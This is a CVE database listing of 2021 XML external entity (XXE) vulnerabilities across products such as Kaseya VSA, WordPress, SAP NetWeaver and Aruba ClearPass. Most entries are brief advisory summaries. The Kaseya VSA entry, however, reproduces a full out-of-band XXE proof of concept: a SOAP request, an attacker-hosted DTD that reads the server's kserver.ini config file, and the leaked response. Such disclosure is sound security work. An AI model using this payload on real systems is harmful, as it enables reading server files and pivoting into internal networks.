Total
1076 CVE
| CVE | Vendors | Products | Updated | CVSS v3.1 |
|---|---|---|---|---|
| CVE-2021-30137 | 1 Axiossystems | 1 Assyst | 2024-08-03 | 7.7 High |
| Assyst 10 SP7.5 has authenticated XXE leading to SSRF via XML unmarshalling. The application allows users to send JSON or XML data to the server. It was possible to inject malicious XML data through several access points. | ||||
| CVE-2021-30201 | 1 Kaseya | 1 Vsa | 2024-08-03 | 7.5 High |
| The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker. Detailed description Given the following request: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:kas="KaseyaWS"> <soapenv:Header/> <soapenv:Body> <kas:PrimitiveResetPassword> <!--type: string--> <kas:XmlRequest><![CDATA[<!DOCTYPE data SYSTEM "http://192.168.1.170:8080/oob.dtd"><data>&send;</data>]]> </kas:XmlRequest> </kas:PrimitiveResetPassword> </soapenv:Body> </soapenv:Envelope> ``` And the following XML file hosted at http://192.168.1.170/oob.dtd: ``` <!ENTITY % file SYSTEM "file://c:\\kaseya\\kserver\\kserver.ini"> <!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error; ``` The server will fetch this XML file and process it, it will read the file c:\\kaseya\\kserver\\kserver.ini and returns the content in the server response like below. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><soap:Fault><faultcode>soap:Server</faultcode><faultstring>Server was unable to process request. ---> There is an error in XML document (24, -1000).\r\n\r\nSystem.Xml.XmlException: Fragment identifier '######################################################################## # This is the configuration file for the KServer. # Place it in the same directory as the KServer executable # A blank line or new valid section header [] terminates each section. # Comment lines start with ; or # ######################################################################## <snip> ``` Security issues discovered --- * The API insecurely resolves external XML entities * The API has an overly verbose error response Impact --- Using this vulnerability an attacker can read any file on the server the webserver process can read. Additionally, it can be used to perform HTTP(s) requests into the local network and thus use the Kaseya system to pivot into the local network. | ||||
| CVE-2021-29620 | 1 Reportportal | 1 Service-api | 2024-08-03 | 7.5 High |
| Report portal is an open source reporting and analysis framework. Starting from version 3.1.0 of the service-api XML parsing was introduced. Unfortunately the XML parser was not configured properly to prevent XML external entity (XXE) attacks. This allows a user to import a specifically-crafted XML file which imports external Document Type Definition (DTD) file with external entities for extraction of secrets from Report Portal service-api module or server-side request forgery. This will be resolved in the 5.4.0 release. | ||||
| CVE-2021-29421 | 2 Fedoraproject, Pikepdf Project | 2 Fedora, Pikepdf | 2024-08-03 | 7.5 High |
| models/metadata.py in the pikepdf package 1.3.0 through 2.9.2 for Python allows XXE when parsing XMP metadata entries. | ||||
| CVE-2021-29447 | 2 Debian, Wordpress | 2 Debian Linux, Wordpress | 2024-08-03 | 7.1 High |
| Wordpress is an open source CMS. A user with the ability to upload files (like an Author) can exploit an XML parsing issue in the Media Library leading to XXE attacks. This requires WordPress installation to be using PHP 8. Access to internal files is possible in a successful XXE attack. This has been patched in WordPress version 5.7.1, along with the older affected versions via a minor release. We strongly recommend you keep auto-updates enabled. | ||||
| CVE-2021-29140 | 1 Arubanetworks | 1 Clearpass | 2024-08-03 | 8.2 High |
| A remote XML external entity (XXE) vulnerability was discovered in Aruba ClearPass Policy Manager version(s): Prior to 6.9.5, 6.8.9, 6.7.14-HF1. Aruba has released patches for Aruba ClearPass Policy Manager that address this security vulnerability. | ||||
| CVE-2021-28973 | 1 Perforce | 1 Helix Alm | 2024-08-03 | 4.9 Medium |
| The XML Import functionality of the Administration console in Perforce Helix ALM 2020.3.1 Build 22 accepts XML input data that is parsed by insecurely configured software components, leading to XXE attacks. | ||||
| CVE-2021-28965 | 3 Fedoraproject, Redhat, Ruby-lang | 7 Fedora, Enterprise Linux, Rhel E4s and 4 more | 2024-08-03 | 7.5 High |
| The REXML gem before 3.2.5 in Ruby before 2.6.7, 2.7.x before 2.7.3, and 3.x before 3.0.1 does not properly address XML round-trip issues. An incorrect document can be produced after parsing and serializing. | ||||
| CVE-2021-28684 | 1 Powerarchiver | 1 Powerarchiver | 2024-08-03 | 4.3 Medium |
| The XML parser used in ConeXware PowerArchiver before 20.10.02 allows processing of external entities, which might lead to exfiltration of local files over the network (via an XXE attack). | ||||
| CVE-2021-28110 | 1 Compassplus | 1 Tranzware E-commerce Payment Gateway | 2024-08-03 | 7.5 High |
| /exec in TranzWare e-Commerce Payment Gateway (TWEC PG) before 3.1.27.5 had a vulnerability in its XML parser. | ||||
| CVE-2021-27931 | 1 Lumis | 1 Lumis Experience Platform | 2024-08-03 | 9.1 Critical |
| LumisXP (aka Lumis Experience Platform) before 10.0.0 allows unauthenticated blind XXE via an API request to PageControllerXml.jsp. One can send a request crafted with an XXE payload and achieve outcomes such as reading local server files or denial of service. | ||||
| CVE-2021-27736 | 1 Fusionauth | 1 Saml V2 | 2024-08-03 | 6.5 Medium |
| FusionAuth fusionauth-samlv2 before 0.5.4 allows XXE attacks via a forged AuthnRequest or LogoutRequest because parseFromBytes uses javax.xml.parsers.DocumentBuilderFactory unsafely. | ||||
| CVE-2021-27741 | 1 Hcltechsw | 1 Hcl Commerce | 2024-08-03 | 9.1 Critical |
| " Security vulnerability in HCL Commerce Management Center allowing XML external entity (XXE) injection" | ||||
| CVE-2021-27635 | 1 Sap | 1 Netweaver Application Server For Java | 2024-08-03 | 6.5 Medium |
| SAP NetWeaver AS for JAVA, versions - 7.20, 7.30, 7.31, 7.40, 7.50, allows an attacker authenticated as an administrator to connect over a network and submit a specially crafted XML file in the application because of missing XML Validation, this vulnerability enables attacker to fully compromise confidentiality by allowing them to read any file on the filesystem or fully compromise availability by causing the system to crash. The attack cannot be used to change any data so that there is no compromise as to integrity. | ||||
| CVE-2021-27604 | 1 Sap | 1 Netweaver Process Integration | 2024-08-03 | 6.5 Medium |
| In order to prevent XML External Entity vulnerability in SAP NetWeaver ABAP Server and ABAP Platform (Process Integration - Enterprise Service Repository JAVA Mappings), versions - 7.10, 7.20, 7.30, 7.31, 7.40, 7.50, SAP recommends to refer this note. | ||||
| CVE-2021-27492 | 3 Datakit, Luxion, Siemens | 6 Crosscadware, Keyshot, Solid Edge Se2020 and 3 more | 2024-08-03 | 5.5 Medium |
| When opening a specially crafted 3DXML file, the application containing Datakit Software libraries CatiaV5_3dRead, CatiaV6_3dRead, Step3dRead, Ug3dReadPsr, Jt3dReadPsr modules in KeyShot Versions v10.1 and prior could disclose arbitrary files to remote attackers. This is because of the passing of specially crafted content to the underlying XML parser without taking proper restrictions such as prohibiting an external DTD. | ||||
| CVE-2021-27184 | 1 Pelco | 1 Digital Sentry Server | 2024-08-03 | 7.5 High |
| Pelco Digital Sentry Server 7.18.72.11464 has an XML External Entity vulnerability (exploitable via the DTD parameter entities technique), resulting in disclosure and retrieval of arbitrary data on the affected node via an out-of-band (OOB) attack. The vulnerability is triggered when input passed to the XML parser is not sanitized while parsing the ControlPointCacheShare.xml file (in a %APPDATA%\Pelco directory) when DSControlPoint.exe is executed. | ||||
| CVE-2021-26969 | 1 Arubanetworks | 1 Airwave | 2024-08-03 | 6.5 Medium |
| A remote authenticated authenticated xml external entity (xxe) vulnerability was discovered in Aruba AirWave Management Platform version(s): Prior to 8.2.12.0. Due to improper restrictions on XML entities a vulnerability exists in the web-based management interface of AirWave. A successful exploit could allow an authenticated attacker to retrieve files from the local system or cause the application to consume system resources, resulting in a denial of service condition. | ||||
| CVE-2021-26703 | 1 Eprints | 1 Eprints | 2024-08-03 | 9.8 Critical |
| EPrints 3.4.2 allows remote attackers to read arbitrary files and possibly execute commands via crafted JSON/XML input to a cgi/ajax/phrase URI. | ||||
| CVE-2021-25951 | 1 Xml2dict Project | 1 Xml2dict | 2024-08-03 | 7.5 High |
| XXE vulnerability in 'XML2Dict' version 0.2.2 allows an attacker to cause a denial of service. | ||||